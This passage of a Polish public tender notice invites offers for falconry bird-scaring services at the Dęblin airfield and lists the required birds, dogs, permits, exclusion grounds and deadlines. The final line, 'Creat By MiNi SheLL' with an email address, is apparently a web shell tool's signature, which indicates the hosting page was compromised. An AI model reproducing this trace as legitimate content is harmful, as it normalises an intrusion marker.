ptaków łowczych zdolnych do pracy, posiadających świadectwa zwalniające z zakazów podejmowania działań komercyjnych wydane przez Ministra Środowiska na podstawie art. 8 ust. 1 i 3 rozporządzenia Rady (WE) nr 338/97 z dnia 9 grudnia 1996 r. w sprawie ochrony gatunków dzikiej fauny i flory w drodze regulacji handlu nimi, (świadectwo CITES) oraz zgodnie z art. 64 ustawy o ochronie przyrody zarejestrowanych we właściwym dla miejsca ich utrzymywania starostwie powiatowym;<br/>e)	odpowiednimi dokumentami Europejskiego świadectwa pochodzenia, w tym dla wyhodowanych młodych ptaków, które są przetrzymywane i szkolone na lotnisku;<br/><br/>Optymalnie do pracy na lotnisku Wykonawca będzie wykorzystywał następujące gatunki ptaków:<br/>•	Raróg (Falco cherrug)<br/>•	Raróg górski (Falco biarmicus)<br/>•	Sokół wędrowny (Falco peregrinus)<br/>•	Jastrząb (Accipiter gentilis)<br/>•	Myszołowiec (Parabuteo unicinctus)<br/>•	lub inne gatunki, których wykorzystanie zostanie wskazane, jako zasadne na dęblińskim lotnisku oraz uzgodnione z Zamawiającym<br/><br/> Wykonawca nie będzie przetrzymywał i wykorzystywał do pracy na lotnisku żadnych gatunków sów (Strigiformes) oraz pustułki (Falco tinnunculus);<br/><br/><br/>f)	dokumentem stwierdzającym zarejestrowanie ptaków, przewidzianych do wykonania przedmiotu zamówienia we właściwym terytorialnie Starostwie Powiatowym zgodnie z art. 64 ustawy o ochronie przyrody zarejestrowanych we właściwym dla miejsca ich utrzymywania starostwie powiatowym (dla posiadanych ptaków łowczych);<br/>g)	odpowiednim dokumentem Europejskiego świadectwa pochodzenia, w tym dla wyhodowanych młodych ptaków, które są przetrzymywane i szkolone na lotnisku (Świadectw zwalniających z zakazów podejmowania działań komercyjnych wydanych przez Ministra Środowiska na podstawie art. 8 ust. 1 i 3 rozporządzenia Rady (WE) nr 338/97 z dnia 9 grudnia 1996 r. w sprawie ochrony gatunków dzikiej fauny i flory w drodze regulacji handlu nimi, (świadectwo CITES);<br/>h)	co najmniej dwa psy najlepiej różnych ras, tak aby zróżnicowaną pracą uzupełniały się w ramach pro-aktywnych (sama obecność psów) oraz re-aktywnych (płoszenie ptaków) działań. Zaleca się do stosowania na lotniskach psów średniej wielkości, pochodzących z następujących grup (zgodnie z klasyfikacją Związku Kynologicznego w Polsce), zgodnych z podziałem ras psów Międzynarodowej Organizacji Kynologicznej (FCI):<br/>GRUPA 1 – (jedna rasa: Border collie) <br/>GRUPA 6 – (np. gończy polski, posokowiec) <br/>GRUPA 7 – (np. spaniel bretoński, pointer, seter angielski, wyżeł niemiecki) <br/>GRUPA 8 – (jedna rasa: płochacz niemiecki) <br/>Każdy z psów musi posiadać książeczkę zdrowia z aktualnymi szczepieniami wymaganymi przez obowiązujące przepisy.<br/><br/>i)	Książeczkami zdrowia z aktualnymi wymaganymi przez obowiązujące przepisy szczepieniami (dla wszystkich posiadanych psów) wraz z dokumentami ich pochodzenia;<br/><br/>j)	w samochodzie i swobodnie posługuje się kluczem terenowym do identyfikacji ptaków (optymalnie Przewodnik Collinsa, Ptaki).<br/><br/>Wykonawca wpisuje informacje dot. zadeklarowanych narzędzi i zwierząt do Wykazu narzędzi stanowiącego Załącznik Nr 11 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.3.	W zakresie potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania zamawiający zażąda: <br/>2.3.1.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 1 i 4) ustawy Pzp; <br/><br/>Zgodnie z treścią art. 274 ust. 4 ustawy Pzp Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne. W związku z powyższym, jeżeli Wykonawca oraz każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia – konsorcja/spółki cywilne – wskaże w oświadczeniu załącznik Nr 2/2a do SWZ bazy, z których Zamawiający bezpłatnie może pozyskać określone dokumenty potwierdzające sytuację podmiotową Wykonawcy – to Zamawiający nie będzie wzywał Wykonawcy do ich złożenia. <br/><br/>2.3.2.	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. 2021 poz. 275), z innym Wykonawcą, który złożył odrębną ofertę/ ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp Wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>2.3.3.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>	art. 108 ust. 1 pkt 3 ustawy, <br/>	art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>	art. 108 ust. 1 pkt 5 ustawy Pzp odnośnie do zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>	art. 108 ust. 1 pkt 6 ustawy, <br/>	art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170)<br/>	art. 7 ust. 1 ustawy z dnia 13 kwietnia o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/><br/>Wzór oświadczenia stanowi załącznik nr 7/7a do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1.	W zakresie potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, Zamawiający zażąda:<br/>2.1.1.	ważną Legitymację Polskiego Związku Łowieckiego wraz z dowodem opłaconych składek na cały okres trwania umowy, z ważnymi uprawnieniami sokolniczymi udokumentowanymi wpisem do wyżej wymienionej Legitymacji PZŁ dla 2 osób zgłoszonych do realizacji usługi płoszenia ptactwa i innych zwierząt. Przy czym co najmniej jedna z tych osób musi posiadać minimum roczne doświadczenie w świadczeniu usług odstraszania ptaków metodą sokolniczą na terenie lotnisk wojskowych lub cywilnych (potwierdzone referencjami w przypadku Wykonawcy lub jego oświadczeniem, że co najmniej 1 osoba u niego zatrudniona realizowała usługi płoszenia ptactwa metodą sokolniczą na lotniskach wojskowych lub cywilnych w okresie minimum 1 roku.<br/>2.1.2.	ważną Decyzję wydaną przez Ministra Środowiska na łowienie zwierzyny przy użyciu ptaka łowczego dla każdej ze zgłoszonych do realizacji umowy osób;<br/>2.1.3.	ważne zezwolenie na broń myśliwską wraz z zaświadczeniem o sprawności technicznej broni myśliwskiej.<br/>2.2.	W zakresie potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego posiadania zdolności technicznej lub zawodowej Zamawiający zażąda:<br/>2.2.1.	wykazu usług wykonanych- Z przedłożonego wykazu musi wynikać w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie musi wynikać, że wykonawca należycie wykonał co najmniej: <br/>	jedno zamówienie (umowę) obejmującą swoim zakresem: świadczenie usług płoszenia ptactwa metodą sokolniczą na lotniskach cywilnych lub wojskowych wraz z podaniem jej wartości, opisu przedmiotu usługi, okresu wykonania i podmiotu na rzecz którego usługa została zrealizowana wraz z załączeniem dokumentu potwierdzającego, czy usługa jest lub została wykonana należycie o wartości nie mniejszej niż 180 000,00 zł brutto (sto osiemdziesiąt tysięcy złotych ) <br/>2.2.2.	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego<br/>W wykazie osób o którym mowa wyżej wykonawca winien wykazać osoby, którymi będzie dysponował na etapie realizacji zamówienia, spełniające następujące wymagania:<br/>	dysponuje co najmniej dwiema osobami posiadającymi uprawnienia sokolnicze <br/>	Przynajmniej jedna z osób posiadających uprawnienia sokolnicze musi posiadać co najmniej roczne doświadczenie w wykonywaniu usług odstraszania ptaków metodą sokolniczą na terenie lotnisk wojskowych lub cywilnych.<br/>	Osoby posiadające uprawnienia sokolnicze muszą posiadać ważną decyzję wydaną przez Ministra Środowiska na łowienie zwierzyny przy użyciu ptaka łowczego na podstawie Ustawy z dnia 13.10.1995 r. – Prawo łowieckie;<br/>2.2.3.	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych <br/>W wykazie wykonawca powinien wykazać, że dysponuje następującymi narzędziami i zwierzętami:<br/>	co najmniej 1 samochodem <br/>	co najmniej jednym pistoletem hukowym;<br/>	środkami optycznymi, potrzebnymi do identyfikacji ptaków (lornetka);<br/>	Wykonawca wykaże, że posiada w samochodzie i swobodnie posługuje się kluczem terenowym do identyfikacji ptaków (optymalnie Przewodnik Collinsa, Ptaki);<br/>	od 4 do 8 ptaków łowczych zdolnych do pracy<br/>	co najmniej dwa psy najlepiej różnych ras, tak aby zróżnicowaną pracą uzupełniały się w ramach pro-aktywnych (sama obecność psów) oraz re-aktywnych (płoszenie ptaków) działań. <br/>2.2.4.	dokumentu stwierdzającego zarejestrowanie ptaków, przewidzianych do wykonania przedmiotu zamówienia we właściwym terytorialnie Starostwie Powiatowym <br/>2.2.5.	odpowiedniego dokumentu Europejskiego świadectwa pochodzenia, w tym dla wyhodowanych młodych ptaków, które są przetrzymywane i szkolone na lotnisku <br/>2.2.6.	Książeczki zdrowia z aktualnymi wymaganymi przez obowiązujące przepisy szczepieniami (dla wszystkich posiadanych psów) wraz z dokumentami ich pochodzenia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Każdy Wykonawca do upływu terminu składania ofert zobowiązany jest złożyć: <br/>1.1.	Formularz ofertowy stanowiący załącznik Nr 1 do SWZ<br/><br/>1.2.	Aktualne na dzień składania ofert Oświadczenie o niepodleganiu wykluczeniu składane na podstawie art. 125 ust. 1 ustawy Prawo zamówień publicznych (według wzoru – załącznika Nr 2 do SWZ)<br/>1.3.	Aktualne na dzień składania ofert Oświadczenie o spełnianiu warunków udziału w postępowaniu (według wzoru – załącznika Nr 3 do SWZ) <br/>1.4.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>a)	Aktualne na dzień składania ofert Oświadczenie o niepodleganiu wykluczeniu składane na podstawie art. 125 ust. 1 ustawy Prawo zamówień publicznych (według wzoru – załącznika Nr 2 do SWZ) oraz Oświadczenie o spełnianiu warunków udziału w postępowaniu (według wzoru – załącznika Nr 3 do SWZ) – w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym bądź podpisem osobistym. <br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/><br/>b)	oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp – składają tylko Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Z oświadczenia musi wynikać, które usługi wykonają poszczególni Wykonawcy (według wzoru – załącznika Nr 5 do SWZ)<br/>1.5.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem własnym, o którym mowa w pkt 1 .3, 1.4, także:<br/>a)	oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu (według wzoru – załącznika Nr 2a do SWZ) oraz <br/>b)	oświadczenie podmiotu udostępniającego zasoby potwierdzające spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (według wzoru – załącznika Nr 3a do SWZ) oraz<br/>c)	Zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (jeżeli dotyczy) – wg wzoru stanowiącego załącznik Nr 4 do SWZ;<br/>1.6.	Pełnomocnictwo<br/>1.7.	Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 lub art. 109 ust. 1 pkt 1 i 4) ustawy Pzp<br/>1.8.	Uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	Wspólne ubieganie się o udzielenie zamówienia publicznego: <br/>1)	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2)	Wykonawcy wspólnie ubiegający się o zamówienie (Konsorcjum/ wspólnicy spółki cywilnej) w rozumieniu art. 58 ustawy Pzp: <br/>a)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia i wniesienie zabezpieczenia należytego wykonania umowy; <br/>b)	ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia, zgodnie z art. 58 ust. 2 ustawy Pzp – fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów – wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem; <br/>c)	pełnomocnictwo powinno jednoznacznie wskazywać jakiego postępowania dotyczy, Wykonawców wspólnie ubiegających się o zamówienia, dane pełnomocnika, czynności jakie w postępowaniu ma prawo wykonywać pełnomocnik; <br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie dotyczące braku podstaw do wykluczenia oraz oświadczenie potwierdzające spełnianie warunków udziału w postępowaniu składa odrębnie każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie stanowiące załącznik nr 5 do SWZ, z którego wynika, które usługi wykonają poszczególni wykonawcy. <br/>5)	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o zamówienie. <br/>6)	Wymagania dotyczące wykonawcy stosuje się odpowiednio do wykonawców, wspólnie ubiegających się o udzielenie zamówienia. <br/>7)	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców. <br/>8)	Zgodnie z art. 117. ust. 2 ustawy Pzp - warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <br/>9)	W przypadku, o którym mowa w pkt 8), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy – według wzoru – załącznika Nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Przyszłe zobowiązania wykonawcy związane z umową i jej realizacją są określone przepisami ustawy z dnia 11 września 2019r Prawo zamówień publicznych (t.j. Dz.U.2023 poz. 1605 z późn. zm.) oraz przepisami Kodeksu Cywilnego.<br/>2.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy stanowią załącznik nr 8 do SWZ.<br/>3.	Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej SWZ, danych zawartych w projektowanych postanowieniach umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, o których mowa w pkt. 2.<br/>4.	Zamawiający wymaga, aby wybrany wykonawca zawarł z nim umowę na warunkach określonych w projektowanych postanowieniach umowy.<br/>5.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartych umów w przypadkach i na warunkach określonych w §14 projektowanych postanowień umowy (stanowiących załącznik Nr 8 do SWZ).<br/>6.	W przypadku okoliczności wymienionych w art. 456 ustawy Pzp Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o wskazanych okolicznościach.<br/><br/>§ 14 <br/>ZMIANY UMOWY<br/><br/>1.	Zmiany umowy wymagają zgodnej woli stron oraz zachowania formy pisemnej w postaci aneksu, pod rygorem nieważności w poniższym zakresie:<br/>1)	Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba – w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków;<br/>2)	wartość umowy może ulec zmianie w przypadku zmiany ustawowej stawki podatku VAT;<br/>3)	gdy ze względu na zmianę przepisów prawa (uchylenia, zmiany lub nowelizacji przepisów) lub z innych przyczyn o charakterze obiektywnym nie będzie możliwe spełnienie przez Wykonawcę tych wymogów lub konieczne będzie spełnienie wymogów dodatkowych;<br/>4)	na podstawie art. 455 ust. 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych dopuszczalne są również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, w przypadku zamówień na usługi, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/><br/>§ 15<br/>KLAUZULA WALORYZACYJNA<br/><br/>1.	Zgodnie z art. 439 ust. 1 ustawy Pzp, Strony wprowadzają zasady zmian wysokości wynagrodzenia należnego wykonawcy, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>2.	Zmiana wysokości wynagrodzenia w przypadku, o którym mowa w ust. 1 będzie obejmować wyłącznie część wynagrodzenia należnego Wykonawcy, w odniesieniu do której nastąpiła zmiana wysokości kosztów wykonania umowy przez Wykonawcę w związku ze zmianą ceny materiałów i kosztów związanych z realizacją umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z dokumentami określonymi w rozdziale XII pkt. 2 i 3 należy złożyć za pośrednictwem platformy pod adresem SMART PZP pod adresem: https://portal.smartpzp.pl/41blsz/module/lista_zadan, na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-08 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Postępowanie prowadzone jest zgodnie z ustawą z dnia 11 września 2019r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm), zwaną dalej „ustawą Pzp”. W postępowaniu mają zastosowanie przepisy ustawy Pzp oraz aktów wykonawczych wydanych na jej podstawie. W zakresie nieuregulowanym przez ww. akty prawne stosuje się przepisy ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny.<br/>2.	Postępowania prowadzone jest w trybie podstawowym o wartości szacunkowej nie przekraczającej w złotych równowartości kwoty określonej dla dostaw i usług w przepisach wydanych na podstawie art. 3 ust. 3 ustawy Pzp tj. 140 000,00 Euro.<br/>3.	Do niniejszego postępowania mają zastosowanie przepisy określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. <br/>4.	Dokumentacja prowadzonego postępowania oraz wszelkie zmiany i wyjaśnienia treści SWZ dostępne będą na stronie prowadzonego postępowania pod adresem: https://portal.smartpzp.pl/41blsz , zwanej dalej „Platformą”. <br/><br/>2.	Oferty wariantowe<br/>Zamawiający nie dopuszcza możliwości składania ofert wariantowych.<br/><br/>3.	Zamawiający nie dopuszcza składania ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty;<br/><br/>4.	Umowa ramowa<br/>Zamawiający nie przewiduje zawarcia umowy ramowej; <br/><br/>5.	Aukcja elektroniczna<br/>Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej;<br/><br/>6.	Zamówienia, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp<br/>Zamawiający nie przewiduje możliwości udzielenia dotychczasowemu wykonawcy usług, o których mowa w art. 214 ust. 1 pkt 8 ustawy Pzp, polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego.<br/><br/>7.	Rozliczenia w walutach obcych<br/>Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>8.	Zwrot kosztów udziału w postępowaniu<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>9.	Zaliczki na poczet udzielenia zamówienia<br/>Zamawiający nie przewiduje udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;<br/>10.	Unieważnienie postępowania <br/>Zamawiający przewiduje możliwość unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 oraz 256 ustawy Pzp. Zgodnie z art. 310 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość unieważnienia przedmiotowego postępowania, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/><br/>11.	Rozliczenia między Zamawiającym, a Wykonawcą. <br/>Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w złotych polskich (PLN). <br/><br/>12.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy Zakupowej (zwanej dalej: Platformą) pod adresem: https://portal.smartpzp.pl/41blsz (strona dotycząca tego postępowania)<br/><br/><br/>13.	Zamawiający nie dokonuje podziału zamówienia na części. <br/><br/>Uzasadnienie braku podziału na części.<br/>Podział zamówienia na części utrudniłby w znacznym stopniu prowadzenie należytej ochrony sokolniczej. Skoordynowanie działań różnych wykonawców realizujących poszczególne części zamówienia mogłaby wprowadzić niepotrzebne działania przeciwstawne co mogłoby poważnie zagrozić bezpieczeństwu lotów zwiększając ryzyko zderzenia statku powietrznego z ptakami. <br/><br/>Prowadzenie działań monitorowania i ograniczania występowania ptaków i innych zwierząt bytujących na terenie lotniska w Dęblinie zmniejsza zagrożenie zderzenia statków powietrznych z ptakami i zwierzyną mogącą wtargnąć na drogę startową lub kołowania a tym samym zwiększa poziom bezpieczeństwa lotów. Usługa odstraszania ptaków na lotniskach jest czynnością standardową i jest niezbędna dla zachowania odpowiedniego poziomu bezpieczeństwa operacji lotniczych.

Creat By MiNi SheLL
Email: jattceo@gmail.com